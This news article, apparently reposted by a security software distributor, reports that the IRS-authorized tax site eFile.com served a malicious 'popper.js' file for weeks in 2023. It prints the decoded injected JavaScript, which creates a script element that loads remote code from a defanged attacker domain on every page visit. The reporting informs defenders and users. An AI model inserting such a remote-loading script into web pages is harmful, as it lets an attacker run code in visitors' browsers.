IRS-authorized eFile.com tax return software caught serving JS malware

By Ax Sharma April 4, 2023 05:00 AM

If it was not already bad enough with the Banking issues going on

eFile.com, an IRS-authorized e-file software service provider used by many for filing their tax returns, has been caught serving JavaScript malware.

Security researchers state the malicious JavaScript file existed on eFile.com website for weeks. BleepingComputer has been able to confirm the existence of the malicious JavaScript file in question, at the time.

Note, this security incident specifically concerns eFile.com and not IRS’ e-file infrastructure or identical sounding domains.
Just in time for tax season

eFile.com was caught serving malware, as spotted by multiple users and researchers. The malicious JavaScript file in question is called ‘popper.js’:
eFile.com serving malicious popper.js file
The ‘popper.js’ file used by eFile.com across its webpages contains malware
​​​(BleepingComputer)

The development comes at a crucial time when U.S. taxpayers are wrapping up their IRS tax returns before the April 18th due date.

The highlighted code above is base64-encoded with its decoded version shown below. The code attempts to load JavaScript returned by infoamanewonliag[.]online:
s=document.createElement(‘script’);
document.body.appendChild(s);
s.src=’//www.infoamanewonliag[.]online/update/index.php?’+Math.random();

The use of Math.random() at the end is likely to prevent caching and load a fresh copy of the malware—should the threat actor make any changes to it, every time eFile.com is visited. At the time of writing, the endpoint was no longer up.

BleepingComputer can confirm, the malicious JavaScript file ‘popper.js’ was being loaded by almost every page of eFile.com, at least up until April 1st.
eFile.com pages serving popper.js
eFile.com pages serving poppers.js (BleepingComputer)

As of today, the file is no longer seen serving the malicious code.
Website ‘hijacked’ over 2 weeks ago

On March 17th, a Reddit thread surfaced where multiple eFile.com users suspected the website was “hijacked.”

At the time, the website showed an SSL error message that, some suspected, was fake and indicative of a hack:

Article (https://www.bleepingcomputer.com/news/security/irs-authorized-efilecom-tax-return-software-caught-serving-js-malware/)

Roy Miehe | MspPortal Partners Inc. | Ceo/President
Security Software Distributor: Bitdefender , Barracuda, Axcient
“Where Service and Technical Skills Count”